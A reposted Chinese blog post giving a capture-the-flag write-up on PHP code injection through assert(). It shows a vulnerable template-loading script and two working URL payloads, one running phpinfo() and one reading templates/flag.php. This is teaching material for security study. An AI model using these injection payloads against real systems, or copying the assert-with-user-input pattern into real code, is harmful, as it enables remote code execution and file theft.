首页 > 其他 > 详细

assert引起的代码注射

时间:2016-10-01 17:27:26      阅读:406      评论:0      收藏:0      [点我收藏+]

源自一道ctf题

<?php

if (isset($_GET[page])) {
    $page = $_GET[page];
} else {
    $page = "home";
}

$file = "templates/" . $page . ".php";
assert("strpos(‘$file‘, ‘..‘) === false") or die("傻了吧我的弟!");
assert("file_exists(‘$file‘)") or die("厉害了我的哥!");

?>
            <?php
                require_once $file;
            ?>

功能:1.page接收参数后组合成变量file。

   2.file经过滤..()防止目录遍历和判断文件是否存在

     3.包含文件

assert()简介:判断一个表达式是否成立。返回true or false。

当参数为字符串时,会被当作php代码执行。

例如 assert("phpinfo()")  <==>  <?phpinfo()?>

writeup:

通过可控变量file传入恶意参数,构造闭合 file_exists(),使assert()执行恶意代码

构造: /?page=123%27)%20or%20phpinfo();%23

  注意闭合‘  )  以及结尾;

关于此处的#:   #是单行注释,由assert("phpinfo()")  <==>  <?phpinfo()?>   可知,#的作用域仅仅是assert(函数内)

利用:/?page=123%27)%20or%20print_r(file_get_contents(%27templates/flag.php%27));%23

解释:file_get_contents把文件读入一个字符串中

最后,assert与eval的区别

assert把整个字符串参数当php代码执行,eval把合法的php代码执行。

 

assert引起的代码注射

原文:http://www.cnblogs.com/sn00py/p/5925944.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!